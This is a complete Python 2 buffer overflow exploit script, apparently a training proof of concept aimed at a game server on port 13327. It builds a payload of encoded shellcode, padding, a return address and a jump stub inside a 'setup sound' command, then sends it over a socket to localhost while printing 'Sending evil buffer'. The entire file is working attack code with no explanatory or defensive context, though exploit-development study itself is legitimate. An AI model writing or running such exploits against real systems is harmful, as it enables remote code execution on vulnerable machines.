#!/usr/bin/python

import socket

host = "127.0.0.1"


shellcode =(
"\xdd\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9\xba\x01\x03\x03\x16\xb1"
"\x14\x31\x55\x19\x83\xed\xfc\x03\x55\x15\xe3\xf6\x32\xcd\x14"
"\x1b\x67\xb2\x89\xb6\x8a\xbd\xcc\xf7\xed\x70\x8e\xa3\xaf\xd8"
"\xe6\x51\x50\xcc\xaa\x3f\x40\xbf\x02\x49\x81\x55\xc4\x11\x8f"
"\x2a\x81\xe3\x0b\x98\x95\x53\x75\x13\x15\xd0\xca\xcd\xd8\x57"
"\xb9\x4b\x88\x68\xe6\xa6\xcc\xde\x6f\xc1\xa4\xcf\xa0\x42\x5c"
"\x78\x90\xc6\xf5\x16\x67\xe5\x55\xb4\xfe\x0b\xe5\x31\xcc\x4c")

ret="\x97\x45\x13\x08"
crash = shellcode+"\x41" * (4368-105) + ret + "\x83\xC0\x0C\xFF\xE0\x90\x90"

buffer = "\x11(setup sound "+ crash + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer.."
s.connect((host, 13327))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload sent!"
